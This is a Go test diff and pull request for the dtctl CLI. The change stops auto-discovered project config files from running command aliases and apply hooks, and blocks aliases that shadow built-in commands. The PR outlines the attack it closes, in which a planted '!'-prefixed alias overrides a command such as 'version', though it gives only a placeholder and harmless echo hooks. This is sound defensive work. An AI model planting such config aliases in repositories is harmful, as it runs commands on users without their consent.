+		t.Errorf("aliases after round-trip = %v, want both preserved", raw.Aliases)
+	}
+	if raw.Preferences.Hooks.PreApply != "echo global-hook" {
+		t.Errorf("global pre-apply hook after round-trip = %q, want preserved", raw.Preferences.Hooks.PreApply)
+	}
+	if len(raw.Contexts) != 1 || raw.Contexts[0].Context.Hooks.PreApply != "echo ctx-hook" {
+		t.Errorf("context pre-apply hook after round-trip not preserved: %+v", raw.Contexts)
+	}
+}
+
 // TestLoad_LocalConfigNoExecKeys verifies that a clean local config (no aliases
-// or hooks) loads without being flagged as stripped.
+// or hooks) loads without being flagged as carrying ignored exec keys.
 func TestLoad_LocalConfigNoExecKeys(t *testing.T) {
 	// NOT parallel: os.Chdir is process-global and races with other tests.
 	tmpDir, err := os.MkdirTemp("", "dtctl-no-exec-*")
@@ -941,14 +1015,14 @@ contexts:
 	if !cfg.IsLocal() {
 		t.Error("IsLocal() = false, want true")
 	}
-	if cfg.StrippedExecKeys() {
-		t.Error("StrippedExecKeys() = true, want false (no exec keys present)")
+	if cfg.IgnoredExecKeys() {
+		t.Error("IgnoredExecKeys() = true, want false (no exec keys present)")
 	}
 }
 
 // TestLoadFrom_ExplicitConfigKeepsExecKeys verifies that an explicit config
-// path (e.g. --config) is trusted and retains aliases/hooks; only
-// auto-discovered local configs are sanitized.
+// path (e.g. --config) is trusted and honors aliases/hooks; only
+// auto-discovered local configs have their exec keys ignored.
 func TestLoadFrom_ExplicitConfigKeepsExecKeys(t *testing.T) {
 	t.Parallel()
 	tmpDir := t.TempDir()
@@ -973,8 +1047,8 @@ preferences:
 	if cfg.IsLocal() {
 		t.Error("IsLocal() = true, want false for explicit config path")
 	}
-	if cfg.StrippedExecKeys() {
-		t.Error("StrippedExecKeys() = true, want false for explicit config path")
+	if cfg.IgnoredExecKeys() {
+		t.Error("IgnoredExecKeys() = true, want false for explicit config path")
 	}
 	if _, ok := cfg.GetAlias("wf"); !ok {
 		t.Error("GetAlias(wf) missing; explicit config must retain aliases")


### PR DESCRIPTION
## Summary

A per-project `.dtctl.yaml` is auto-discovered by walking up from the current working directory, so it can originate from a location the user didn't author (a checked-out repo, an unpacked tarball, a shared work dir, a CI checkout). Such a config was previously honored in full — including its two code-execution primitives:

- **command aliases** — a `!`-prefixed alias is resolved and run via `sh -c` before Cobra parses anything, with no confirmation;
- **apply hooks** — `pre-apply`/`post-apply` commands run on every `dtctl apply`.

This means an aliases/hooks block in an auto-discovered config could run external commands as the invoking user. This PR treats an auto-discovered local config as untrusted and removes that capability.

## Changes

- **`pkg/config`** — `Load()` / `LoadWithoutExpansion()` now sanitize an auto-discovered local `.dtctl.yaml`: command aliases and global/per-context apply hooks are stripped. Contexts, tokens, and other preferences are still honored. New `IsLocal()` / `LocalConfigPath()` / `StrippedExecKeys()` accessors expose what happened. An explicit `--config <file>` is unaffected — it stays trusted.
- **`cmd/alias_resolve`** — defense in depth: the built-in-command shadow guard, previously enforced only when an alias was created via `dtctl alias set` / `import`, is now also enforced at **resolution** time, so an alias written directly into any config file can never override a built-in (`get`, `apply`, `version`, …).
- **`cmd/root`** — prints a one-line stderr warning naming the local config when its alias/hook keys are ignored.
- **docs / CHANGELOG** — the configuration docs previously suggested putting aliases/hooks in a project `.dtctl.yaml`; updated to reflect that aliases and hooks are honored only from the global config or `--config`.

## Trust model

| Source | Aliases / hooks honored? |
|---|---|
| Global config (`~/.config/dtctl/config`) | yes |
| Explicit `--config <file>` | yes |
| Auto-discovered local `.dtctl.yaml` (walk-up) | **no** (ignored, warned) |

## Testing

- New: `TestLoad_LocalConfigStripsExecKeys`, `TestLoad_LocalConfigNoExecKeys`, `TestLoadFrom_ExplicitConfigKeepsExecKeys`, `TestResolveAlias_BuiltinShadowGuard`.
- `go test ./...` passes, `go vet` clean, gofmt clean.
- Manual check: with a local config defining `version: "!<command>"`, `dtctl version` now prints the warning and runs the real `version` command instead of the alias.

## Notes / out of scope

- Refusing group/world-writable or non-owned config files was considered but left out — stripping the executable keys from local configs already removes the capability, and a permission/ownership check brings cross-platform complexity. Can be a follow-up if we want ssh/sudoers-style hardening on the global config too.